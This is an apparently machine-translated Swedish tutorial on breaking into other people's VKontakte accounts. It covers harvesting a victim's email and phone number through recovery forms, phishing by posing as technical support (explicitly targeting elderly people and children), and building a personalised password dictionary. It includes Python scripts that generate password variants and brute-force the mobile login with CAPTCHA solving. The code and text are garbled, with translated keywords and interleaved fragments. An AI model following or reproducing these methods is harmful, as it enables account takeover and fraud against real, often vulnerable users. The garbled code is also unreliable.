Steg-för-steg guar av VKontakte-sidor

Artikeln ger flera möjliga metoder för att hacka VKontakte, fokuserat på människor, inte långt i datasäkerhet.

Med andra ord, när hacking inte kommer att användas, och mänskliga sårbarheter kommer att användas. Naturligtvis är metoderna inte universella (och tackar Gud!), Och någon kan ha tillräckligt med hjärnor för att inte böja sig för dina provokationer. Men det finns inte så många, tro mig. Så, låt oss börja. Först och främst, innan du börjar, behöver du en sida som du ska "hacka", fritid och säker tillgång till Vkontakte. Hacking-processen är uppdelad i flera steg.

1. Insamling av information

                    Prefix1 = g.doc.rex_search ('\ + [0-9] *'). Grupp (0)

Först och främst måste du samla in information från sidan av ett potentiellt offer, nämligen:

    1. Sidans URL. Vill du ha ett ID eller om det finns ett alfabetbyte, då det. Konton och annan information vi behöver, alla slags twitter och liknande.
    2. Det skulle vara trevligt att få målet med målet. Om en person inte bara kom in i nätverket kan du hitta mail av enkelt Google. Det är till exempel särskilt bekvämt att leta efter mail på mail.ru. Du kan också försöka söka fullständigt namn. Mål och födelsedatum. Eller andra typer av sådana kombinationer. Om offret har min värld på mail, kommer posten att vara i sidkoden eller i webbadressen.

      I händelse av att det finns mail utan sociala nätverk från mail, kan posten hittas genom att skapa ett falskt brev på den här tjänsten och söka efter Messenger från Mela. Som ett av sätten kan du försöka hitta något förnuftigt med hjälp av målkonton i andra sociala nätverk. Försök till exempel att bryta smeknamnet från alla konton som finns för alla kända posttjänster. Alternativt kan du försöka använda import av postkontakter och erbjuda att lägga till dessa personer som vän. Vi registrerar nästa falska mail och vi får ytterligare konton. Som ett alternativ kan du försöka med lycka med hjälp av återställningsformuläret i Twitter, vilket lär en del av posten. På Facebook kan du direkt söka på kontot genom att ange Mail för att söka.

    3. Telefon. Så lärde den webbadressen och posten, det är fortfarande att få telefonnumret. Bortsett från de fallen när numret hänger utomhus tillgängligt på sidan i Soc. Nätverk eller i vissa projekt (avito / headhuner / inköp eller försäljning av fastighets- / egen webbplats / annat), är endast en metod kvar. Det finns ett e-postmeddelande på mail. Vi presenterar det i form av återhämtning i Vkontakte, och den del av rummet kommer. Och nu samma sak, men på mail. Och om numret är bundet där, kommer du att se en annan, den andra delen av rummet. Om posten inte är ansluten är det en hemlig fråga. Vi slår ut det och tvingar användaren att knyta en mobiltelefon till tjänsten. Utmärkt, det var ett par nummer från posten. För att ta reda på det är det tillräckligt att sortera ut återställningsformen av vkontakte med hjälp av rummet. Bara 99 gånger. Du kan automatisera. Även i vissa fall älskar människor att publicera sitt nummer på sidan, men stäng den del av numret med asterisker, bindestreck och andra nonsens, som också kan förenkla brytprocessen. Om du har tur, kommer du att vara synlig exakt de siffror som inte är tillgängliga i form av återhämtning vk.

2. Hacking vkontakte-sidor

I detta skede försöker vi komma åt målkontot. Tänk på de enklaste teknikerna:

1) "Socinener"

Här är det omedelbart nödvändigt att göra en bokning att detta sätt är att passa bara för dem som känner till lite om Internet, men bestämt av någon anledning att registrera sig i det sociala nätverket. Som regel är det antingen gamla män eller barn.

Om du bara vill träna, kan de nykomlingar av Vkontakte hittas här. I det här fallet gäller en av psykologiska lagar: en person som inte förstår något omedvetet litar på den som är mer erfaren i ett visst område och accepterar hans Ord om tro. Du kan skapa ett redogör för den tekniska supportrepresentanten, skapa ett "officiellt" mail av administrationen och så vidare. Och skapa lite legend. Vilka nya användare måste kontrollera efter registrering och ge till exempel en länk till ett test, enligt resultatet eller att ange vilka inloggningspasset krävs från VC. Det viktigaste är att du agerar noggrant. Du bör övertyga användaren om att den är säker. Denna teknik är väl kombinerad med falska. Dessutom kan avancerade socigenners, ha lärt sig numret på användaren, samtal (anonymt med SIP) och späd direkt. Dessutom bidrar hela den information du angav (telefonnummer / omnämnande av de fakta som indikerar datum / annat) också att etablera kontakt med offret och indirekt indikerar att du är från teknisk support.

2) "Smart" byst

Metoden beräknad på de genomsnittliga användarna. För honom behöver vi en speciell ordbok, skärpad under en viss person. Låt oss räkna ut med strukturen i vår ordbok:

  • Personlig information. Detta inkluderar födelsedatum (11/17/1992 = 1711, 1992, 1711192), ålder (1992, 2017 = 2017, 1992, 24), namn (STAS = STAS, CTAC) och efternamn (Ivanov = Ivanov).
  • Konton från andra sociala. Nätverk och posttjänster (Twitter.com/stasik_ku, Facebook.com/stasss1992, Stasik_IV, Stass1992, Stass92).
  • Hobbies (Fotboll, Simning, Ungdom = Fotboll, Simning, Molodejka, Molodegka).

Det finns också en sida i VK, där den är skrivet, vilka lösenord som ska ange vilka symboler som också är möjliga och de vanligaste lösenorden. Bladet ut ur 14 linjer. Men det behöver fortfarande skapa en kombination av lösenord som vårt offer skulle kunna skapa. Jag presenterar dig mitt lilla skript på Python, som är engagerat i det.

#! Kodning: UTF-8 

Importera SYS, OS

Razdel = ['_', ':', ';'] 

DEF UNIQ (SEQ):

    Sett = set () 

Sett_add = sett.add.

Returnera [x för x i seq om inte (x i sett eller sett_add (x))]

Def Brute_Words (ord):

    new_words = [] 

För jag i ord:

        New_words.Append (i) 

new_words.Append (i [0] .upper () + i [1:])

        new_words.Append (i [0] .upper () + i [1: -1] + i [-1] .upper ()) 

new_words.Append (i.upper ())

    För J i Spisok: 

new_words.append (i + j)

    För m i Razdel: 

new_words.Append (J + M + I)

        new_words.Append (J + I) 

new_words.Append (I * 2 + J)

new_words.Append (J * 2 + I)

new_words.Append (i [0] .upper () + i [1:] + J)

new_words.Append (i [0] .upper () + i [1: -1] + i [-1] .upper () + J)

Returnera UNIQ (new_words)

Def Generera (Words_File):

O = öppen (words_file, 'r')

Ord = o.read (). Splitlines ()

För jag i brute_words (ord):

Skriv ut (i)

DEF MAIN ():

Prova:

argv1 = sys.argv [1]

Generera (argv1)

Utom IndexError:

Skriv ut ("Du måste ange filen")

Utom IoError:

Skriv ut ("Ingen sådan fil")

Om __name__ == "__main__": Huvud ()

Från 14 visade det 1272 alternativ. Jag kommer att ge del. Molodegkactac .

Molodegkactac Molodejka_molodegka. .

Stass92molodejka. Stass92molodegka.

Molodegka_Stass92. Molodegka: Stass92. Molodegka; Stass92. ,Stasss1992Swimming

Swimming_stass1992.

  • Kureginctac
  • Kureginctac
  • KurayGinkuraYgin.
  • KuraYgin_KuraYgin.
  • MOLODEGKA17111992.
  • 1711199217111992molodegka.
  • MOLODEGKAMOLODEGKA17111992.
  • 24.
  • 1711_24.
  • Utmärkt, nu automatisera lösenord brute force genom mobilversionen av vkontakte med ett litet manus.
  • #! Kodning: UTF8.

Importera grepp, re, urllib2 Från antigate import antigate från grepp import grabbteleferror

Från tid import sömn

Cap_key = '123' # din nyckel med antigera

Def Anti (Key, File): Få Captcha påminner om med antigera

Prova:

Om __name__ == "__main__": Prova:

Stass92molodejka. Data = antigera (nyckel, fil)

Molodegka_Stass92. Returnera data.

Utom keyboardinterrupt:

Skriv ut ("Slutförande")

Bortsett från:

Anti (nyckel, fil)

Def Save (URL, File): # Ladda ner en fil på URL

Site = Urllib2.urlopen (URL)

Om __name__ == "__main__": F = öppen (fil, "wb")

Stass92molodejka. F.write (site.read ())

Molodegka_Stass92. Def Cap_Solve (IMG):

Spara (IMG, "CAPTCHA.JPG") Nyckel = anti (cap_key, "captcha.jpg")

Returnyckel. Def Brute (Logga in, Lösenord, Spara):

Ut = öppen (spara, "w ')

PSSWRDS = ÖPPEN (Lösenord, 'R')

Prova:

Int (inloggning)

Prefix = sant.

Bortsett från: Prefix = falskt

Stass92molodejka. G = grab.grab ()

Molodegka_Stass92. G.go ('http://m.vk.com')

För linje i pSSWRDS:

pSSWRD = line.rstrip ('\ r \ n')

G.doc.set_input ('email', inloggning

g.doc.set_input ('Pass', pSSWRD)

g.doc.submit ()

Om g.doc.text_search (u'captcha "):

Bortsett från: All_captchas = re.findall ('"(/ captcha.php [^"] *) "', g.response.body) [0]

Stass92molodejka. Captcha = '' + all_captchas .

Molodegka_Stass92. Nyckel = cap_solve (captcha)

G.doc.set_input ('email', inloggning g.doc.set_input ('Pass', pSSWRD) G.doc.set_input ('CAPTCHA_KEY', STR (Key))

g.doc.submit ()

Skriv ut ("cap")

Om "Bekräfta" i G.Response.Body: Om prefix:

Добавить комментарий